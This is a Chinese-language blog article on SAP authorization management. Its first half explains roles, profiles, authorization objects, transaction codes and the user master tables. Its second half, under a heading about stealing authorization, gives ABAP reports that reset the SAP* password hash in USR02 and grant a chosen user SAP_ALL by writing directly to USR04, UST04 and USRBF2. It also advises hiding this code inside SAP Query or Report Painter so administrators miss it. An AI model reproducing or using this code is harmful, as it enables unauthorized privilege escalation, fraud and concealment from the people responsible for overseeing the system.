首页SAP权限管理审计专家SAP 用户权限

SAP 用户权限

🏷️ SAP权限管理审计专家 ✍️ 致力于SAPERP系统应用的服务商,企业级产品应用供应商。 📅 2026-03-18T08:25:51+00:00

用户权限解剖:

通常basis会使用PFCG做权限管理,使你保存时会产生一个系统外的prifile name,记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?

sap用户登录,sap用户解锁

首先明白几个概念. 1.activity 这样说吧,我们从activity谈起,activity是什么意思这个你查下字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两,不对,这是我老婆讲的,SAP不是这样子的,是只能insert, update,display什么的.这些东西当年德国佬是写在tobj表中的.activity 也是可分activity group的.

2.activity category &Authorization group Role Vs Profile你看看表T020就知道了,就是什么K,D, A, M什么的.

profile是什么呢?实际上可以理解为所有的authorization data(有很多authorization group--{你可使用OBA7填写,权限太细也不是好事^_^}和activity组成)的一个集合的名字,通常一个自定义的role产生一个profile,SAP权限控制是根据profile里的authorization data(objects)来控制的.

role又是什么呢?role只是一个名字而已,然后将profile赋予给它, 比如你SU01建立一个用户,我没有任何role,但是加入SAP_All profile也是可做任何事情.SAP本身有很多default role & profile.

3.最常用的PFCG->authorizations->change authorization data-> 进入后选取selection criteria 可看到所有的authorization objectmanually可手工加authorization object,比如你使用某个t-code权限出错误,abap使用SU53检查就知道缺少哪个authorization objec,然后手工加入就可以.你选去authorization levels就可by account type再细分权限.有些甚至直接到表字段.而且你甚至可給一个object分配缓存buffer.

那么SAP是如何做到权限控制的呢,屠夫就用到小宰一下.

4.关于权限方面的几个t-code.

(一)Role(角色)相关T-code:PFAC 标准PFAC_CHG 改变PFAC_DEL 删除PFAC_DIS 显示PFAC_INS 新建PFAC_STRPFCG 创建ROLE_CMP 比较SUPC 批量建立角色profileSWUJ 测试SU03 检测authorzation dataSU25, SU26 检查updated profile (二)建立用户相关T-code: SU0 SU01 SU01D SU01_NAV SU05 SU50, Su51, SU52 SU1 SU10 批量SU12 批量SUCOMP:维护用户公司地址SU2 change用户参数SUIM 用户信息系统用户组SUGR:维护 SUGRD:显示SUGRD_NAV:还是维护SUGR_NAV:还是显示 (三)关于profile&Authoraztion Data SU02:直接创建profile不用roleSU20:细分Authorization Fields

SU21(SU03):****维护Authorization Objects(TOBJ,USR12).对于凭证你可细分到:F_BKPF_BED: Accounting Document: Account Authorization for CustomersF_BKPF_BEK: Accounting Document: Account Authorization for VendorsF_BKPF_BES: Accounting Document: Account Authorization for G/L AccountsF_BKPF_BLA: Accounting Document: Authorization for Document TypesF_BKPF_BUK: Accounting Document: Authorization for Company CodesF_BKPF_BUP: Accounting Document: Authorization for Posting PeriodsF_BKPF_GSB: Accounting Document: Authorization for Business AreasF_BKPF_KOA: Accounting Document: Authorization for Account TypesF_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy然后你进去还可细分,这些个东西是save在USR12表中的. 在DB层是UTAB.

对具体transaction code细分: SU22,SU24 SU53:*** 就是你出错用来检查没有那些authoraztion objects.SU56:分析authoraztion data buffers.SU87:用来检查用户改变产生的historySU96,SU97,SU98,SU99:干啥的?SUPC:批量产生role

DB和logical层: SUKRI:Transaction Combinations Critical for Securitytables:TOBJ : All avaiable authorzation objects.(全在此)USR12: 用户级authoraztion值-----------------------------USR01:主数据USR02:密码在此USR04:授权在此USR03:User address dataUSR05:User Master Parameter IDUSR06:Additional Data per UserUSR07:Object/values of last authorization check that failedUSR08:Table for user menu entriesUSR09:Entries for user menus (work areas)USR10:User master authorization profilesUSR11:User Master Texts for Profiles (USR10)USR12:User master authorization valuesUSR13:Short Texts for AuthorizationsUSR14:Surchargeable Language Versions per UserUSR15:External User NameUSR16:Values for Variables for User AuthorizationsUSR20:Date of last user master reorganizationUSR21:Assign user name address keyUSR22:Logon data without kernel accessUSR30:Additional Information for User MenuUSR40:Table for illegal passwordsUSR41:当前用户USREFUS:USRBF2USRBF3UST04:User Profile在此UST10C: Composite profilesUST10S: Single profiles (角色对应的UST12 : Authorizations..............................

.............................. 如何窃取权限

..............................

用户: User type用户类型(干啥用的不讲):通常的用户类型有a.dialog (就是normal user)b.communicationc.systemd.servicee.reference.

通常你在使用任何T-code前一定会有权限检测的.AUTHORITY_CHECK:这个函数只是小检查一下你的user有没有,什么时候过期.**如果coding只要使用此函数就够了.AUTHORITY_CHECK_TCODE:检查T-code

这俩函数是真正检查autorization objects的.SUSR_USER_AUTH_FOR_OBJ_GET:AUTHORIZATION_DATA_READ_SELOBJ:------------------------------------------将SAP*的密码改成123的程序,很简单.我们找到那个user logon表USR02.(DF52478E6FF90EEB是经过SAP加密保存在DB的,哪位老兄研究过SAP的密码加密?)report zmodSAP*.data zUSR02 like USR02 .select single * into zUSR02 from USR02where BNAME = 'SAP*'.zUSR02-Bcode = 'DF52478E6FF90EEB' .Update USR02 from zUSR02 .

现在的问题是如何让你那basis不发现,很简单,将code隐藏在Query里面,就是说你做一个query,query是会产生code的,然后你加入此代码,谁能想到???然后你就等你的basis去哭...

这样做太狠毒了.还是自己偷偷搞自己的用户吧.在此你必须对权限结构非常清晰.权限和三个表有关系.a.USR04b.USR04c.USRBF2 这个表是对应到所用的authorzization objects的.*&---------------------------------------------------------------------**& Report : Steal SAP ALL Right **& Creation Date : 2004.04.01 **& Created by : Stone.Fu **& Description : 可窃取SAP ALL权限 **& Modified Date : 2005.11.02*& Description : 将此code hide在report painter or query code **&---------------------------------------------------------------------*

report zrightsteal.data zUSR04 like USR04 . "????????work area??data zUST04 like USR04 .data zPROFS like USR04-PROFS.data ZUSRBF2 like USRBF2 occurs 0 with header line."USRBF2?????internal table** Update Authorization table USR04.select single * into zUSR04 from USR04where BNAME = 'ZABC2'. "SAP All 权限move 'C SAP_ALL' to zPROFS .ZUSR04-NRPRO = '14'.zUSR04-PROFS = zPROFS.Update USR04 from zUSR04 .

**Update User authorization masters table UST04 .select single * into zUST04 from UST04where BNAME = 'ZABC2'.zUST04-PROFILE = 'SAP_ALL'. "SAP all 权限Update UST04 from zUST04 .

*?????insert*ZUST04-MANDT = '200'.*ZUST04-BNAME = 'ZABC2'.*ZUST04-PROFILE = 'SAP_ALL'.*Insert UST04 from ZUST04 .

select * from USRBF2 into table ZUSRBF2where BNAME = 'SAP*' .Loop at ZUSRBF2.ZUSRBF2-BNAME = 'ZABC2'.Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.endloop.INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.

自己建立一个ztest用户不给它任何权限然后在test machine上run 报表zrightsteal.

然后ztest就是SAP_ALL了, 然后你将code hide在SQP query的code中. ABAP code太容易被人发现. K, 现在我碰到一个大问题了, 记账程序被改的出了问题